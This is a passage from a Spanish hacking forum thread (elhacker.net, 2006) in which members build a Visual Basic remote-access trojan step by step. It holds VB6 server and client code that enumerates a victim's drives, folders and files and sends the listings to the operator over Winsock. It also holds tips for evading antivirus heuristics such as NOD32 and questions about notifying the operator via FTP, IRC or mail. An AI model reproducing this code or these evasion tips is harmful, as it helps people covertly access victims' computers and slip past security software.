elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 19:43  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranManual
0 Usuarios y 4 Visitantes están viendo este tema.
Páginas: 1 ... 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 [30] 31 32 33 34 35 36 37 38 Ir Abajo Respuesta Imprimir
Autor Tema: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranManual  (Leído 112,435 veces)
pamela02

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranManual
« Respuesta #435 en: 9 Enero 2006, 19:23 »

Me referia a la inyeccion de codigo para saltar los firewall (no el de windows XP).
En línea
Rudy21

Desconectado Desconectado

Mensajes: 149


Rudy21 Web Design


Ver Perfil WWW
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranMan
« Respuesta #436 en: 10 Enero 2006, 03:31 »

JAJAJAJAJAJAJA :D ;D tanto esfuerzo para que?

termine de hacer mi troyan todo perfect excepto por algo

Me lo eliminio el Antivirus jojoj y me dice que link.vbs o algo asi

pero no pude copilar el Server jjajajajajajaja todo mi trabajo a la basura jajajajajaja


salu2 :rolleyes:
En línea


-Xenon-


Desconectado Desconectado

Mensajes: 500


Spectrum 128k


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranMan
« Respuesta #437 en: 10 Enero 2006, 14:34 »


exagerado, solo tienes que modificar algunas cosas, sobre todo, la creacion de la clave del registro, hacerlo con apis, y obtener el directorio del sistema tambien con apis,  eso y poco mas y es indetectable
En línea

Cuando el ingenio se queda pequeño,
No basta con poner empeño,
Solo el talento consigue el diseño
Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranMan
« Respuesta #438 en: 10 Enero 2006, 14:39 »

si no kieres k la heuristica de el nod32 te le detecte en el form load no puedes poner ninguna funcion k kree una clave en el registro.

Salu2
En línea

franky231

Desconectado Desconectado

Mensajes: 30


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranManual
« Respuesta #439 en: 13 Enero 2006, 16:00 »

yo no se si me pasara a mi solo o a mas gente y tampoco lo e mirao xk son 30 paginas xD,, asik si alguien me ayuda...
use el codigo d scugat d la pagina 11 para ver las unidades, carpetas y archivos y funciona bien pero el problema esk si le das a disco C: solo se muestran las carpetas y los archivos de la ruta donde esta el servidor,, se puede solucionar esto para k cuando seleccionas la unidad C: salga directamente en la raiz, donde sale lo d archivos de programa,windows y todo eso
Salu2
En línea
-Xenon-


Desconectado Desconectado

Mensajes: 500


Spectrum 128k


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranMan
« Respuesta #440 en: 13 Enero 2006, 21:21 »


joder ahora no lo recuerdo bien, ami tambien me paso hace bastante tiempo, con mi propio codigo, y lo solucione ( me parece ) indicandole asi:  c:\ el directorio de c, quiero decir, me parece que el programa enviaba solo como ruta: "c:" y habia que ponerle la barra al final \ , no me acuerdo creo que era eso, o que habia que usar otra propiedad del objeto drive1, pruebalo, mira aver si es eso, y si no postea el codigo en un momentin y te lo digo mas seguro

En línea

Cuando el ingenio se queda pequeño,
No basta con poner empeño,
Solo el talento consigue el diseño
franky231

Desconectado Desconectado

Mensajes: 30


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranManual
« Respuesta #441 en: 14 Enero 2006, 12:05 »

pues pongo el codigo del server k es donde tiene k estar el problema
Código:
Private Sub WSCAR_DataArrival(ByVal bytesTotal As Long)
Dim DCar As String
WSCAR.GetData DCar
If Mid(DCar, 1, 6) = "\rutad" Then Call rutad(Mid(DCar, 7))
End Sub

y aora el rutad k es donde debe de estar el fallo

Código:
Public Function rutad(ruta As String)
On Error GoTo Error
If ruta = "" Then
For i = 0 To Drive1.ListCount - 1
WSCAR.SendData "\list" & Drive1.List(i)
Call Sleep(200)
Next
Else
Dir1.path = ruta
For i = 0 To Dir1.ListCount - 1
WSCAR.SendData "\list" & Dir1.List(i)
Call Sleep(200)
Next
Form1.File1.path = ruta
For i = 0 To Form1.File1.ListCount - 1
WSCAR.SendData "\list" & File1.path & File1.List(i)
Call Sleep(200)
Next
End If
Exit Function
Error:
End Function
« Última modificación: 14 Enero 2006, 12:08 por franky231 » En línea
-Xenon-


Desconectado Desconectado

Mensajes: 500


Spectrum 128k


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranMan
« Respuesta #442 en: 14 Enero 2006, 14:30 »


no me has hecho caso?, pon un

Código:
msgbox ruta


en la funcion, para saber si cuando envias c:\, es eso lo que recibe

dir1.path , haz eso, joder, si el problema es que envias c:\, y no te devuelve ese path, si no el path en donde esta la aplicacion, tendras que mirar lo primero eso,para ver si es correcto, y yo creo que va a ser eso, que te saldra c: en vez de c:\

MIRALO
En línea

Cuando el ingenio se queda pequeño,
No basta con poner empeño,
Solo el talento consigue el diseño
franky231

Desconectado Desconectado

Mensajes: 30


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranManual
« Respuesta #443 en: 14 Enero 2006, 14:42 »

si sale C: en vez de C:\
En línea
-Xenon-


Desconectado Desconectado

Mensajes: 500


Spectrum 128k


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranMan
« Respuesta #444 en: 14 Enero 2006, 16:03 »


pues eso era, haz que al mandarle el directorio como path, añada antes de enviarlo la p**a "\"
En línea

Cuando el ingenio se queda pequeño,
No basta con poner empeño,
Solo el talento consigue el diseño
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranMan
« Respuesta #445 en: 14 Enero 2006, 16:50 »

Pequeño manual para obtener las carpetas y ficheros de un ordenador remoto en una carpeta determinada. Se necesita un listbox dirbox y un drive
Código:
Private Sub Dir1_Change() 'Si cambia el directorio cambia los fichero que hay en el
File1 = Dir1
End Sub

Private Sub Drive1_Change() 'Si cambia la unidad cambia la carpetas que hay en ellas
Dir1 = Drive1
End Sub
Private Sub Winsock1_OnDataArrival(ByVal bytesTotal As Long)
winsock1.getdata mensaje
If Mid(mensaje, 1, 3) = "lis" Then ' Si los 3 primeros caracteres son lis
ruta = Mid(mensaje, 5)
listar ruta 'Llamamos a la función para listar los ficheros de esa unidad y carpeta
End If
end sub
Function listar(sitio)
On Error GoTo er
Dir1.Path = sitio
Dir1.Refresh
For i = 0 To Dir1.ListCount - 1 'esto dice las carpetas que hay en el directorio
Espera 50 'Ponemos un tiempo de espera para que al enviar los datos no se cualgue
winsock1.senddata "<" & Dir1.List(i) & ">" 'Ponemos <directorio> para indetificar que es una carpeta
Next
File1.Refresh
For i = 0 To File1.ListCount - 1 'esto dice los ficheros que hay en el directorio
Espera 50 ' Lo mismo que en lo anterior
winsock1.senddata "f" & File1.List(i) 'ponemos f al principio para indicar que es un fichero
Next
GoTo fin
er:
enviar "e"
fin:

End Function
Public Function Espera(MiliSegundos As Single) 'Función que me dejo lympex para que se pueda esperar un tiempo x; o sea un sleep
  Dim ComienzoSeg As Single
  Dim FinSeg As Single
  ComienzoSeg = Timer
  FinSeg = ComienzoSeg + (MiliSegundos / 1000)
  Do While FinSeg > Timer
      DoEvents
      If ComienzoSeg > Timer Then
          FinSeg = FinSeg - 24 * 60 * 60
      End If
  Loop
End Function
Y luego en el cliente:
Código:
Private Sub Command3_Click()
winsock1.senddata "lis " & Text8.Text 'el text8 se corresponde con la ruta
List1.Clear
End Sub
Private Sub Ws_DataArrival(ByVal bytesTotal As Long)
winsock1.getddata mensaje
If Mid(mensaje, 1, 1) = "<" Then
mensaje = Mid(mensaje, 1, Len(mensaje) - 2)
List1.AddItem mensaje
mensaje = ""
End If
If Mid(mensaje, 1, 1) = "f" Then

mensaje = Mid(mensaje, 2, Len(mensaje) - 3)
List1.AddItem mensaje
mensaje = ""
End If
end sub
Esto se tiene que enviar:
Citar
lis c:\
Y entonces el otro va respondiendo:
<c:\carpeta>
<c:\carpeta2>
farchivo.ext
farchivo2.ext
Saludos y que hos sea útil  ::)
« Última modificación: 14 Enero 2006, 16:53 por Rey11 » En línea

franky231

Desconectado Desconectado

Mensajes: 30


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranManual
« Respuesta #446 en: 14 Enero 2006, 19:59 »

vale ya esta solucionado gracias  ;)
En línea
TheCrash

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranMan
« Respuesta #447 en: 18 Enero 2006, 22:14 »

se podria hacer que el troyano notifique por ftp ?
disculpen pero no tengo mucha edea en vb y no sabria ahcer el codigo.
desde ya mcuhas gracias.
salu2
En línea
SheKeL_C$


Desconectado Desconectado

Mensajes: 510


_-=[Sh3K3L_C$]=-_


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranMan
« Respuesta #448 en: 18 Enero 2006, 22:27 »

el q t notifiq por ftp es algo q puedes llegar a tardar mucho mas pork tienes q mirarlo cada vez q t acuerdes, mejor q lo agas por irc q t lo explica muy bien  en la 1 o 2 pagina

si todavia quieres utilizar el ftp, dale al boton buscar o sino luego digo el post en q lo explicaban
En línea

En un momento complicado de mi vida quise suicidarme y cinco minutos despues quise quedarme

Peliculas en mp4 para el ipod/iphone/psp
TheCrash

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranMan
« Respuesta #449 en: 19 Enero 2006, 00:55 »

si es verdad. pero lo que apsa es que no peudo hacer q me funcione la notificacion por mail ... ahroa voya ver la del mirc.
gracias, si laguien tiene algun tipo de notificacion que no se la SIN se los agracdeseria.
salu2
En línea
Páginas: 1 ... 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 [30] 31 32 33 34 35 36 37 38 Ir Arriba Respuesta Imprimir 

Ir a:  

Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines